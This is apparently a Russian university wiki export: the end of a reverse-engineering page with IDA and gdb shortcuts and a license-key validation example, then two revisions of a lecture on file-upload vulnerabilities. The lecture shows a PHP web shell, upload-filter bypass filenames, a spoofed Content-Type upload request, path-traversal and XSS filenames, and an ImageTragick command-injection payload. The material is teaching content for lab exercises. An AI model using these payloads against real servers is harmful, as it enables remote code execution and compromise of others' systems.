</center>
==== IDA ====
* {{клавиша|P}} — создать функцию, начиная с текущей позиции курсора
* {{клавиша|F5}} — декомпилировать функцию
* {{клавиша|Enter}} — проследовать по курсору (например, перейти к функции или массиву)
* {{клавиша|Esc}} — назад (противоположность {{клавиша|Enter}})
* {{клавиша|X}} — показать ссылки на то, что под курсором (на функцию, переменную, строку, etc.)
* {{клавиша|C}} — переопределить байты, начиная с курсора, как код.
* {{клавиша|D}} — переопределить байты, начиная с курсора, как данные (последовательные нажатия переключают размер переменной byte-word-dword(-qword))
* {{клавиша|A}} — переопределить байты, начиная с курсора, как строку
* {{клавиша|R}} — переопределить число в инструкции как строку (<code>mov rdx, 335F47414C465Fh</code> -> <code>mov rdx, '3_GALF_'</code>)
Неплохой [https://radare.gitbooks.io/radare2book/content/debugger/migration.html#shortcuts список] из доков по radare2.

==== Hex-Rays ====
* {{клавиша|N}} — переименовать
* {{клавиша|Y}} — поменять тип
** Может показаться, что с помощью {{клавиша|Y}} можно и переименовать, или с помощью {{клавиша|N}} задать тип, однако это не так
* {{клавиша|Enter}} — проследовать по курсору
* {{клавиша|Esc}} — назад
* {{клавиша|Tab}} — перейти к данному месту из декомпилированного в дизассемблированный код и обратно

[https://www.hex-rays.com/products/decompiler/manual/interactive.shtml Полный список] на официальном сайте.

== gdb ==

С '''gdb''' можно познакомиться по любому туториалу в интернете.

Однако в отладке приложений без исходников есть некоторая специфика, и тут могут быть особенно полезные такие команды:

* <code>b * 0x400155</code> - поставить брэйкпоинт на адрес.
* <code>p (char*)$rdi</code> - напечатать как строку содержимое памяти, на которую указывает регистр <code>rdi</code>. См. также [https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI статью про соглашения вызовов на Википедии].
* <code>help x</code> - почитать справку по команде <code>x</code>, которая очень полезна для изучения содержимого памяти.
* <code>x/10i $pc</code> - посмотреть несколько инструкций вперед.
* <code>layout asm</code> - переключиться в псевдографический режим с листингом ассемблерных команд.

== Примеры с занятия ==

Бинарники, которые были рассмотрены на семинаре: [[Media:2020_reverse_examples.zip]].

Исходник первого примера: [[Media:2019 reverse example 1.c]]

Пример валидного ключа: <code>AAAAA-BBBBB-CCCCC-B334C
</code>

Алгоритм проверки ключа на Python:
<pre>
import string
import hashlib

def validate_key(s):
if len(s) != 23:
return False

for i, c in enumerate(s):
if i in (5, 11, 17):
if c != '-':
return False
else:
if c not in (string.ascii_uppercase + string.digits):
return False

m = hashlib.md5()
m.update(s[:17].encode('ascii'))
m.update(bytes([0x4d,0x67,0xde,0xb9,0x60,0xce,0x38,0x30,0xe1,0xb7,0x40,0xe5,0xeb,0x39,0xe0,0x15]))

return s[18:] == m.hexdigest()[:5].upper()
</pre>

Файл:2020 reverse examples.zip

2020-11-09T14:45:30Z

Romankholin94:

Веб-безопасность/Уязвимости FileUpload

2020-10-15T18:43:44Z

Romankholin94: /* Задания */

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php.
==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Задания=
* http://easy.stands.cyberschool.msu.ru/
* http://type.stands.cyberschool.msu.ru/
* http://hand.stands.cyberschool.msu.ru

=Ссылки=
* [https://drive.google.com/file/d/1Jep20CuBfcfKAeStwnHgR0gCf-O2Wgd0/view?usp=sharing Презинтация]
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Веб-безопасность/Уязвимости FileUpload

2020-10-15T12:45:50Z

Romankholin94: /* Ссылки */

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php.
==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Задания=
* https://easy.stands.cyberschool.msu.ru/
* https://type.stands.cyberschool.msu.ru/
* https://hand.stands.cyberschool.msu.ru

=Ссылки=
* [https://drive.google.com/file/d/1Jep20CuBfcfKAeStwnHgR0gCf-O2Wgd0/view?usp=sharing Презинтация]
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
